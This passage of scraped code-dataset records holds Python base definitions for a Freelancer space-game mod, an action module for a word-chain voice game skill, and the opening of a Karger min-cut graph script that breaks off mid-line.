Scient\nclass rh_biz_04_Base(Base):\n NAME = 'rh_biz_04_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandShieldgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Military Base (Kologne)\nclass rh_biz_05_Base(Base):\n NAME = 'rh_biz_05_Base'\n SYSTEM = rh_biz\n SHIPS = [\n # ???\n ]\n\n LEVEL = LEVEL_4\n\n GUN = RheinlandHeavygun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# West Pirates\nclass rh_biz_06_Base(Base):\n NAME = 'rh_biz_06_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHessiangun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# East Pirates\nclass rh_biz_07_Base(Base):\n NAME = 'rh_biz_07_Base'\n SYSTEM = rh_biz\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandPirategun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Starke Largestation\nclass sig8_01_Base(Base):\n NAME = 'sig8_01_Base'\n SYSTEM = sig8\n\n LEVEL = LEVEL_4\n\n GUN = RheinlandLightgun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# Junker Station\nclass sig8_02_Base(Base):\n NAME = 'sig8_02_Base'\n SYSTEM = sig8\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Police outpost\nclass sig8_04_Base(Base):\n NAME = 'sig8_04_Base'\n SYSTEM = sig8\n SHIPS = [\n Banshee,\n ]\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# mining space shipping\nclass om15_01_Base(Base):\n NAME = 'om15_01_Base'\n SYSTEM = om15\n SHIPS = [\n CSV_Mk2,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# junkers\nclass om15_03_Base(Base):\n NAME = 'om15_03_Base'\n SYSTEM = om15\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Traders\nclass om15_04_Base(Base):\n NAME = 'om15_04_Base'\n SYSTEM = om15\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\nclass om15_miner_01(Base):\n NAME = 'om15_miner_01'\n SYSTEM = om15\n\n\nclass om15_miner_02(Base):\n NAME = 'om15_miner_02'\n SYSTEM = om15\n\n\nclass om15_miner_03(Base):\n NAME = 'om15_miner_03'\n SYSTEM = om15\n\n\nclass rh_stut_01_Base(Base):\n NAME = 'rh_stut_01_Base'\n SYSTEM = rh_stut\n SHIPS = [\n Banshee,\n # Humpback2,\n Sabre,\n ]\n\n\nclass rh_stut_02_Base(Base):\n NAME = 'rh_stut_02_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_03_Base(Base):\n NAME = 'rh_stut_03_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_04_Base(Base):\n NAME = 'rh_stut_04_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_05_Base(Base):\n NAME = 'rh_stut_05_Base'\n SYSTEM = rh_stut\n\n\nclass rh_stut_06_Base(Base):\n NAME = 'rh_stut_06_Base'\n SYSTEM = rh_stut\n\n\n# Berlin \nclass rh_ber_01_Base(Base):\n NAME = 'rh_ber_01_Base'\n SYSTEM = rh_ber\n SHIPS = [\n Starflier2,\n CSV,\n Starblazer,\n ]\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Prison\nclass rh_ber_02_Base(Base):\n NAME 
= 'rh_ber_02_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_MAIN\n POWER = misc.RH_MAIN\n SHIELD = misc.RH_MAIN\n THRUSTER = misc.RH_MAIN\n\n\n# Solar plant\nclass rh_ber_03_Base(Base):\n NAME = 'rh_ber_03_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandShieldgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Junker Freeport\nclass rh_ber_04_Base(Base):\n NAME = 'rh_ber_04_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Hessian outpost\nclass rh_ber_05_Base(Base):\n NAME = 'rh_ber_05_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHessiangun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Police\nclass rh_ber_06_Base(Base):\n NAME = 'rh_ber_06_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandHuntergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# ALG ?\nclass rh_ber_07_Base(Base):\n NAME = 'rh_ber_07_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Junkers\nclass rh_ber_08_Base(Base):\n NAME = 'rh_ber_08_Base'\n SYSTEM = rh_ber\n\n LEVEL = LEVEL_2\n\n GUN = RheinlandJunkergun\n ENGINE = misc.RH_PIRATE\n POWER = misc.RH_PIRATE\n SHIELD = misc.RH_PIRATE\n THRUSTER = misc.RH_PIRATE\n\n\n# Rheinland miner\nclass sig13_01_Base(Base):\n NAME = 'sig13_01_Base'\n SYSTEM = sig13\n\n LEVEL = LEVEL_1\n\n GUN = RheinlandCivgun\n ENGINE = misc.RH_CIV\n POWER = misc.RH_CIV\n SHIELD = misc.RH_CIV\n THRUSTER = misc.RH_CIV\n\n\n# Liberty miner\nclass sig13_02_Base(Base):\n NAME = 'sig13_02_Base'\n SYSTEM = sig13\n\n\nclass sig13_03_Base(Base):\n NAME = 'sig13_03_Base'\n SYSTEM = sig13\n\n\nclass li_cal_01_Base(Base):\n NAME = 'li_cal_01_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_02_Base(Base):\n NAME = 'li_cal_02_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_03_Base(Base):\n NAME = 'li_cal_03_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_04_Base(Base):\n NAME = 'li_cal_04_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_05_Base(Base):\n NAME = 'li_cal_05_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_06_Base(Base):\n NAME = 'li_cal_06_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_07_Base(Base):\n NAME = 'li_cal_07_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_08_Base(Base):\n NAME = 'li_cal_08_Base'\n SYSTEM = li_cal\n\n\nclass li_cal_09_Base(Base):\n NAME = 'li_cal_09_Base'\n SYSTEM = li_cal\n\n\nclass sig22_01_Base(Base):\n NAME = 'sig22_01_Base'\n SYSTEM = sig22\n\n\nclass sig22_02_Base(Base):\n NAME = 'sig22_02_Base'\n SYSTEM = sig22\n\n\nclass sig22_04_Base(Base):\n NAME = 'sig22_04_Base'\n SYSTEM = sig22\n\nclass sig42_01_Base(Base):\n NAME = 'sig42_01_Base'\n SYSTEM = sig42\n\n\nclass sig42_02_Base(Base):\n NAME = 'sig42_02_Base'\n SYSTEM = sig42\n\n\nclass li_mnh_01_Base(Base):\n NAME = 'li_mnh_01_Base'\n SYSTEM = li_mnh\n SHIPS = [\n # Piranha2,\n # Barracuda2,\n # Rhino2,\n ]\n\n\nclass li_mnh_02_Base(Base):\n NAME = 'li_mnh_02_Base'\n SYSTEM = li_mnh\n SHIPS = [\n # Dromader2,\n ]\n\n\nclass li_mnh_03_Base(Base):\n NAME = 'li_mnh_03_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_04_Base(Base):\n NAME = 'li_mnh_04_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_05_Base(Base):\n NAME = 'li_mnh_05_Base'\n SYSTEM = 
li_mnh\n\n\nclass li_mnh_06_Base(Base):\n NAME = 'li_mnh_06_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_07_Base(Base):\n NAME = 'li_mnh_07_Base'\n SYSTEM = li_mnh\n\n\nclass li_mnh_09_Base(Base):\n NAME = 'li_mnh_09_Base'\n SYSTEM = li_mnh\n\n\nclass li_for_01_Base(Base):\n NAME = 'li_for_01_Base'\n SYSTEM = li_for\n SHIPS = [\n Startracker,\n Starblazer,\n CSV_Mk2,\n ]\n\nclass li_for_02_Base(Base):\n NAME = 'li_for_02_Base'\n SYSTEM = li_for\n\n\nclass li_for_03_Base(Base):\n NAME = 'li_for_03_Base'\n SYSTEM = li_for\n\n\nclass li_for_04_Base(Base):\n NAME = 'li_for_04_Base'\n SYSTEM = li_for\n\n\nclass li_for_05_Base(Base):\n NAME = 'li_for_05_Base'\n SYSTEM = li_for\n\n\nclass li_for_06_Base(Base):\n NAME = 'li_for_06_Base'\n SYSTEM = li_for\n\n\nclass sig17_01_Base(Base):\n NAME = 'sig17_01_Base'\n SYSTEM = sig17\n\n\nclass sig17_02_Base(Base):\n NAME = 'sig17_02_Base'\n SYSTEM = sig17\n\n\nclass sig17_03_Base(Base):\n NAME = 'sig17_03_Base'\n SYSTEM = sig17\n\nclass sig17_04_Base(Base):\n NAME = 'sig17_04_Base'\n SYSTEM = sig17\n\nclass li_col_01_Base(Base):\n NAME = 'li_col_01_Base'\n SYSTEM = li_col\n\n\nclass li_col_02_Base(Base):\n NAME = 'li_col_02_Base'\n SYSTEM = li_col\n\n\nclass li_col_03_Base(Base):\n NAME = 'li_col_03_Base'\n SYSTEM = li_col\n\n\nclass li_col_04_Base(Base):\n NAME = 'li_col_04_Base'\n SYSTEM = li_col\n\n\nclass li_col_06_Base(Base):\n NAME = 'li_col_06_Base'\n SYSTEM = li_col\n\n\nclass li_col_07_Base(Base):\n NAME = 'li_col_07_Base'\n SYSTEM = li_col\n\n\nclass Tau31_01_Base(Base):\n NAME = 'Tau31_01_Base'\n SYSTEM = tau31\n\n\nclass Tau31_02_Base(Base):\n NAME = 'Tau31_02_Base'\n SYSTEM = tau31\n\n\nclass Tau31_03_Base(Base):\n NAME = 'Tau31_03_Base'\n SYSTEM = tau31\n\n\nclass br_wrw_01_Base(Base):\n NAME = 'br_wrw_01_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_02_Base(Base):\n NAME = 'br_wrw_02_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_03_Base(Base):\n NAME = 'br_wrw_03_Base'\n SYSTEM = br_wrw\n\n\nclass br_wrw_04_Base(Base):\n NAME = 'br_wrw_04_Base'\n SYSTEM = br_wrw\n\n\nclass Tau37_01_Base(Base):\n NAME = 'Tau37_01_Base'\n SYSTEM = tau37\n\n\nclass Tau37_02_Base(Base):\n NAME = 'Tau37_02_Base'\n SYSTEM = tau37\n\nclass Tau37_03_Base(Base):\n NAME = 'Tau37_03_Base'\n SYSTEM = tau37\n\nclass Tau37_04_Base(Base):\n NAME = 'Tau37_04_Base'\n SYSTEM = tau37\n\n\nclass Tau29_01_Base(Base):\n NAME = 'Tau29_01_Base'\n SYSTEM = tau29\n\n\nclass Tau29_02_Base(Base):\n NAME = 'Tau29_02_Base'\n SYSTEM = tau29\n\n\nclass Tau29_03_Base(Base):\n NAME = 'Tau29_03_Base'\n SYSTEM = tau29\n\nclass br_cam_01_Base(Base):\n NAME = 'br_cam_01_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_02_Base(Base):\n NAME = 'br_cam_02_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_03_Base(Base):\n NAME = 'br_cam_03_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_04_Base(Base):\n NAME = 'br_cam_04_Base'\n SYSTEM = br_cam\n\n\nclass br_cam_05_Base(Base):\n NAME = 'br_cam_05_Base'\n SYSTEM = br_cam\n\n\nclass br_avl_01_Base(Base):\n NAME = 'br_avl_01_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_02_Base(Base):\n NAME = 'br_avl_02_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_03_Base(Base):\n NAME = 'br_avl_03_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_04_Base(Base):\n NAME = 'br_avl_04_Base'\n SYSTEM = br_avl\n\n\nclass br_avl_06_Base(Base):\n NAME = 'br_avl_06_Base'\n SYSTEM = br_avl\n\n\nclass Tau23_01_Base(Base):\n NAME = 'Tau23_01_Base'\n SYSTEM = tau23\n\n\nclass Tau23_02_Base(Base):\n NAME = 'Tau23_02_Base'\n SYSTEM = tau23\n\n\nclass Tau23_03_Base(Base):\n NAME = 'Tau23_03_Base'\n SYSTEM = tau23\n\n\nclass 
Tau23_04_Base(Base):\n NAME = 'Tau23_04_Base'\n SYSTEM = tau23\n\n\nclass Tau23_m7_Base(Base):\n NAME = 'Tau23_m7_Base'\n SYSTEM = tau23\n\n\n\nclass ku_ksu_01_base(Base):\n NAME = 'ku_ksu_01_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_02_base(Base):\n NAME = 'ku_ksu_02_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_03_base(Base):\n NAME = 'ku_ksu_03_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_04_base(Base):\n NAME = 'ku_ksu_04_base'\n SYSTEM = ku_ksu\n\n\nclass ku_ksu_05_base(Base):\n NAME = 'ku_ksu_05_base'\n SYSTEM = ku_ksu\n\n\nclass tau4_01_base(Base):\n NAME = 'tau4_01_base'\n SYSTEM = tau4\n\n\nclass tau4_02_base(Base):\n NAME = 'tau4_02_base'\n SYSTEM = tau4\n\n\nclass tau4_03_base(Base):\n NAME = 'tau4_03_base'\n SYSTEM = tau4\n\n\nclass tau4_04_base(Base):\n NAME = 'tau4_04_base'\n SYSTEM = tau4\n\n\nclass ku_hns_01_base(Base):\n NAME = 'ku_hns_01_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_02_base(Base):\n NAME = 'ku_hns_02_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_03_base(Base):\n NAME = 'ku_hns_03_base'\n SYSTEM = ku_hns\n\n\nclass ku_hns_04_base(Base):\n NAME = 'ku_hns_04_base'\n SYSTEM = ku_hns\n\n\nclass ku_tgk_01_base(Base):\n NAME = 'ku_tgk_01_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_02_base(Base):\n NAME = 'ku_tgk_02_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_03_base(Base):\n NAME = 'ku_tgk_03_base'\n SYSTEM = ku_tgk\n\n\nclass ku_tgk_04_base(Base):\n NAME = 'ku_tgk_04_base'\n SYSTEM = ku_tgk\n\n\nclass ku_hkd_01_base(Base):\n NAME = 'ku_hkd_01_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_02_base(Base):\n NAME = 'ku_hkd_02_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_03_base(Base):\n NAME = 'ku_hkd_03_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_06_base(Base):\n NAME = 'ku_hkd_06_base'\n SYSTEM = ku_hkd\n\n\nclass ku_hkd_07_base(Base):\n NAME = 'ku_hkd_07_base'\n SYSTEM = ku_hkd\n\n\nclass om7_01_base(Base):\n NAME = 'om7_01_base'\n SYSTEM = om7\n\n\nclass om7_02_base(Base):\n NAME = 'om7_02_base'\n SYSTEM = om7\n\n\nclass om7_03_base(Base):\n NAME = 'om7_03_base'\n SYSTEM = om7\n\n\nclass co_cur_01_base(Base):\n NAME = 'co_cur_01_base'\n SYSTEM = co_cur\n\n\nclass co_cur_02_base(Base):\n NAME = 'co_cur_02_base'\n SYSTEM = co_cur\n\n\nclass om2_01_base(Base):\n NAME = 'om2_01_base'\n SYSTEM = omicron2\n\n\nclass om2_03_base(Base):\n NAME = 'om2_03_base'\n SYSTEM = omicron2\n\n\nclass om2_04_base(Base):\n NAME = 'om2_04_base'\n SYSTEM = omicron2\n\n\nclass om1_01_base(Base):\n NAME = 'om1_01_base'\n SYSTEM = omicron1\n\n\nclass tau26_01_base(Base):\n NAME = 'tau26_01_base'\n SYSTEM = tau26\n\n\nclass tau26_02_base(Base):\n NAME = 'tau26_02_base'\n SYSTEM = tau26\n\n\nclass up1_01_base(Base):\n NAME = 'up1_01_base'\n SYSTEM = upsilon1\n\n\nclass up1_02_base(Base):\n NAME = 'up1_02_base'\n SYSTEM = upsilon1\n\n\nclass up1_03_base(Base):\n NAME = 'up1_03_base'\n SYSTEM = upsilon1\n\n\nclass co_mad_01_base(Base):\n NAME = 'co_mad_01_base'\n SYSTEM = co_mad\n\n\nclass co_mad_03_base(Base):\n NAME = 'co_mad_03_base'\n SYSTEM = co_mad\n\n\nclass co_val_01_base(Base):\n NAME = 'co_val_01_base'\n SYSTEM = co_val\n\n\nclass om11_01_base(Base):\n NAME = 'om11_01_base'\n SYSTEM = om11\n\n\nclass om11_02_base(Base):\n NAME = 'om11_02_base'\n SYSTEM = om11\n\nclass om11_03_base(Base):\n NAME = 'om11_03_base'\n SYSTEM = om11\n\nclass om11_04_base(Base):\n NAME = 'om11_04_base'\n SYSTEM = om11\n\n\nclass co_och_01_base(Base):\n NAME = 'co_och_01_base'\n SYSTEM = co_och\n\n\nclass co_och_02_base(Base):\n NAME = 'co_och_02_base'\n SYSTEM = co_och\n\n\nclass co_och_04_base(Base):\n NAME = 'co_och_04_base'\n 
SYSTEM = co_och\n\n\nclass up2_01_base(Base):\n    NAME = 'up2_01_base'\n    SYSTEM = upsilon2\n\nclass up2_02_base(Base):\n    NAME = 'up2_02_base'\n    SYSTEM = upsilon2\n\nclass up2_03_base(Base):\n    NAME = 'up2_03_base'\n    SYSTEM = upsilon2\n\n\nclass up2_05_base(Base):\n    NAME = 'up2_05_base'\n    SYSTEM = upsilon2\n\n\nclass co_cad_01_base(Base):\n    NAME = 'co_cad_01_base'\n    SYSTEM = co_cad\n\n\nclass co_cad_02_base(Base):\n    NAME = 'co_cad_02_base'\n    SYSTEM = co_cad\n\n\nclass co_cad_03_base(Base):\n    NAME = 'co_cad_03_base'\n    SYSTEM = co_cad\n\n\nclass co_cad_04_base(Base):\n    NAME = 'co_cad_04_base'\n    SYSTEM = co_cad\n\n\nclass om13_01_Base(Base):\n    NAME = 'om13_01_Base'\n    SYSTEM = om13\n\n\nclass om13_02_Base(Base):\n    NAME = 'om13_02_Base'\n    SYSTEM = om13\n\n\nclass br_uls_01_base(Base):\n    NAME = 'br_uls_01_base'\n    SYSTEM = br_uls\n\n\nclass br_uls_02_base(Base):\n    NAME = 'br_uls_02_base'\n    SYSTEM = br_uls\n","repo_name":"Jeider/freelancer_nomad_legacy","sub_path":"Assets/Pythonlancer/universe/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":19354,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"5935176626","text":"from typing import Type\n\nfrom core.stats_storage import UserStats\nfrom settings import *\nfrom core.utils import get_nouns, is_equal_seq_words2\nfrom core.words_source import get_random_word\nfrom .models import *\n\n\nasync def new_session_new_user(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Check condition: the skill was launched by a new player.\n    \"\"\"\n    if (await stats.user_name == '') and not (await stats.games_count):\n        await stats.log_session()\n        return True\n    return False\n\n\nasync def new_session_friend(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Check condition: the skill was launched by a Friend, a player whose name is known.\n    If the condition holds, the user name is added to the player list.\n    \"\"\"\n    un = await stats.user_name\n    if un != '':\n        game.users_clear_all()\n        game.users_append_new(un)\n        await stats.log_session()\n        return True\n    return False\n\n\nasync def new_session_unknown_friend(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Check condition: the skill was launched by a returning player whose name is not known.\n    \"\"\"\n    if await stats.games_count:\n        await stats.log_session()\n        return True\n    return False\n\n\nasync def start_new_game(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Start a new game.\n    \"\"\"\n    game.start_game()\n    game.game_process.player_say(get_random_word())\n    await stats.log_new_game()\n    return True\n\n\nasync def a_game_set_player_name(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Set the user name.\n    The name is taken not from the request's \"entities\" (nlu) but by parsing the\n    user utterance field (original_utterance), because the nlu result is not\n    available while the skill is being developed.\n    \"\"\"\n
    value = get_nouns(alice_request.request.original_utterance)\n    if isinstance(value, list) and len(value) > 0:\n        value = value[0].capitalize()\n        if len(value) > 0:\n            game.users_clear_all()\n            game.users_append_new(value)\n            await stats.log_user_name(value)\n            return True\n    return False\n\n\nasync def set_friend_name(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Set the user name.\n    The name is taken not from the request's \"entities\" (nlu) but by parsing the\n    user utterance field (original_utterance), because the nlu result is not\n    available while the skill is being developed.\n    \"\"\"\n    value = get_nouns(alice_request.request.original_utterance)\n    if isinstance(value, list) and len(value) > 0:\n        value = value[0].capitalize()\n        if len(value) > 0:\n            await stats.log_user_name(value)\n            return True\n    return False\n\n\nasync def game_process_need_repeat(alice_request, game, *args):\n    \"\"\"\n    Check condition: the incoming data cannot be identified as the expected word\n    sequence, in which case the user must be asked to repeat the input.\n    This happens when speech from another person was \"captured\" and/or the\n    utterance was not addressed to \"Alice\" at all.\n    If the condition holds, we report that the input was not understood.\n    \"\"\"\n    if alice_request.request.original_utterance == '':\n        return True\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if not is_ok and ((diff > DIFFERENT_MAX_DIST) or diff == 0):\n        return True\n    return False\n\n\nasync def a_game_process_user_lost(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Check condition: the user made a mistake in the word sequence.\n    If the condition holds, the user is considered to have lost.\n    \"\"\"\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n\n    if not is_ok:\n        await stats.log_game_lost()\n        return True\n\n    # Important detail: since the functions below only run when the user made NO\n    # mistake, we store the human player's word here and generate the bot's word\n    # (i.e. the bot effectively takes its turn).\n    game.game_process.player_say(word)\n    game.game_process.player_say(get_random_word())\n    await stats.log_word(word)\n    return False\n\n\nasync def a_game_process_user_won(alice_request, game: Type[Game], stats: Type[UserStats], *args):\n    \"\"\"\n    Check condition: the number of words in the sequence exceeds the maximum (a predefined value).\n    If the condition holds, the user is considered the winner.\n    \"\"\"\n    # TODO: instead of the constant A_GAME_MAX_WORDS_COUNT this should use the user's\n    # previous best score. Also consider the case where an adult hands the skill to a\n    # child: it may make sense to reset the threshold to the word count reached when\n    # the game was lost.\n
    if len(game.game_process.words) >= A_GAME_MAX_WORDS_COUNT:\n        await stats.log_game_won()\n        return True\n    return False\n\n\nasync def a_game_process_half_game(alice_request, game, *args):\n    \"\"\"\n    Check condition: the number of words in the sequence equals half of the maximum\n    (a predefined value).\n    \"\"\"\n    if len(game.game_process.words) in [A_GAME_HALF_GAME, A_GAME_HALF_GAME + 1]:\n        return True\n    return False\n\n\nasync def b_game_player_names(alice_request, game, *args):\n    \"\"\"\n    Player name entry.\n    Check condition: at least two valid names were entered.\n    \"\"\"\n    value = get_nouns(alice_request.request.original_utterance)\n    if len(value) < 2:\n        return False\n    game.users.clear()\n    game.users.extend([i.capitalize() for i in value])\n    return True\n\n\nasync def b_game_process_last_player_lost(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made a mistake and is the only player left.\n    The game ends; the bot has won.\n    \"\"\"\n    if len(game.game_process.players) != 2:\n        return False\n\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if not is_ok:\n        game.game_process.current_player_do_lost()\n        return True\n    return False\n\n\n# Next move is the bot's and the user made no mistake - the only remaining player wins\nasync def b_game_process_last_player_won(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made NO mistake AND is the only player AND the word limit is reached.\n    The game ends; the player has won.\n    \"\"\"\n    if len(game.game_process.players) != 2:\n        return False\n\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if is_ok and len(game.game_process.words) >= B_GAME_MAX_WORDS_COUNT:\n        return True\n    return False\n\n\nasync def b_game_process_player_lost_next_bot(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made a mistake AND the current turn is the bot's.\n    The bot says a word and the turn passes to the next player.\n    \"\"\"\n    if not game.game_process.next_player.is_bot:\n        return False\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if not is_ok:\n        game.game_process.current_player_do_lost()\n        game.game_process.player_say(get_random_word())\n        return True\n    return False\n\n\nasync def b_game_process_one_player_left(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made NO mistake AND is the only player left.\n    The bot says a word and the turn passes to the next player.\n    \"\"\"\n    if not game.game_process.next_player.is_bot:\n        return False\n    if len(game.game_process.players) != 2:\n        return False\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if is_ok:\n        game.game_process.player_say(word)\n        game.game_process.player_say(get_random_word())\n        return True\n    return False\n\n\nasync def b_game_process_next_bot(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made NO mistake AND the current turn is the bot's.\n    The bot says a word and the turn passes to the next player.\n    \"\"\"\n
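    # The bot first records the player's word and then answers with a random\n    # word, so the shared sequence grows by two on every bot turn.\n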
    if not game.game_process.next_player.is_bot:\n        return False\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if is_ok:\n        game.game_process.player_say(word)\n        game.game_process.player_say(get_random_word())\n        return True\n    return False\n\n\nasync def b_game_process_player_lost_next_player(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made a mistake AND the next turn belongs to another human player (not the bot).\n    \"\"\"\n    if game.game_process.next_player.is_bot:\n        return False\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if not is_ok:\n        game.game_process.current_player_do_lost()\n        return True\n    return False\n\n\nasync def b_game_process_next_player(alice_request, game, *args):\n    \"\"\"\n    Check condition: the player made NO mistake AND the next turn belongs to another human player (not the bot).\n    \"\"\"\n    if game.game_process.next_player.is_bot:\n        return False\n    is_ok, word, diff = is_equal_seq_words2(game.game_process.words, alice_request.request.original_utterance)\n    if is_ok:\n        game.game_process.player_say(word)\n        return True\n    return False\n","repo_name":"x6b726173/alice-word-by-word","sub_path":"word_by_word/core/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16079328029","text":"import random\r\n\r\ndef checkSelfLoops(checkDict):\r\n\tfor key in checkDict:\r\n\t\tcheckDict[key] = [y for y in checkDict[key] if y != key]\r\n\treturn checkDict\r\n\r\ndef replaceItem(lst, itemIn, itemOut):\r\n\tfor i in range(len(lst)):\r\n\t\tif lst[i] == itemOut:\r\n\t\t\tlst[i] = itemIn\r\n\treturn lst\r\n\r\ndef permutDict(checkDict, vertIn, vertOut):\r\n\tcheckDict[vertIn].extend(checkDict[vertOut])\r\n\tfor item in checkDict[vertOut]:\r\n\t\tif item != vertOut:\r\n\t\t\tcheckDict[item] = replaceItem(checkDict[item], vertIn, vertOut)\r\n\tcheckSelfLoops(checkDict)\r\n\tcheckDict.pop(vertOut)\r\n\treturn checkDict\r\n\r\n\r\ndef min_cut(inp):\r\n\twhile (len(inp.keys()) > 2):\r\n\t\trandomEdge_1 = random.choice(list(inp.keys()))\r\n\t\trandomEdge_2 = random.choice(inp[randomEdge_1])\r\n\t\tinp = permutDict(inp, randomEdge_1, randomEdge_2)\r\n\treturn inp\r\n\r\n\r\nf = open('kargerMinCut.txt', 'r')\r\nlst = f.readlines()\r\nfor i in 